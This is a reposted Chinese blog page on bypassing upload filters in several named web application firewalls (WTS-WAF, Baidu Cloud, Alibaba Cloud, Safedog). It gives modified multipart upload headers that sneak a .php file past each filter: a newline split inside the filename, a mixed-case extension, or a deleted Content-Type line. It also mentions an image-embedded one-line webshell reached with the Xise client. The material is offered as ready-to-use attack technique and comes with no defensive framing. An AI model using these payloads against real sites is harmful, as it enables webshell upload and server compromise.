上传绕过WAF几种常见的姿势 - 走看看

zoukankan html css js c++ java

上传绕过WAF几种常见的姿势

1：WTS-WAF 绕过上传
原内容：
Content-Disposition: form-data; name="up_picture"; filename="xss.php"
添加回车
Content-Disposition: form-data; name="up_picture"; filename="xss.ph
p"

2：百度云上传绕过见下：
百度云绕过就简单的很多很多，在对文件名大小写上面没有检测php是过了的，Php就能过，或者PHP，一句话自己合成图片马用Xise连接即可。
Content-Disposition: form-data; name="up_picture"; filename="xss.jpg .Php"
3：阿里云上传绕过见下：
源代码：
Content-Disposition: form-data; name="img_crop_file"; filename="1.jpg .Php"Content-Type: image/jpeg
修改如下：
Content-Disposition: form-data; name="img_crop_file"; filename="1.php"
没错，将=号这里回车删除掉Content-Type: image/jpeg即可绕过。
4：安全狗上传绕过见下：
源代码:
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png"Content-Type: image/png
绕过内容如下：
Content-Disposition: form-data; name="image"; filename="085733uykwusqcs8vw8wky.png
C.php"
删除掉ontent-Type: image/jpeg只留下c，将.php加c后面即可，但是要注意额，双引号要跟着c.php".

查看全文

相关阅读:
AOP概述
 函数调用规定
 lexical scoping vs. dynamic scoping
[C++]C++11新特性
 JavaScript Tutorial 05 #Class#
JavaScript Tutorial 04 #Function#
JavaScript Tutorial 03 #Array#
JavaScript Tutorial 02 #Object#
JavaScript Tutorial 01 #Basic#
Win32 Thread Information Block

原文地址：https://www.cnblogs.com/xishaonian/p/6861441.html

最新文章
【boost】MFC dll中使用boost thread的问题
 EF DI & MVC
EF UoC
ks
图片
 UEditor
Alvin
temp
Assembly binding
Tech Links

Copyright © 2011-2022 走看看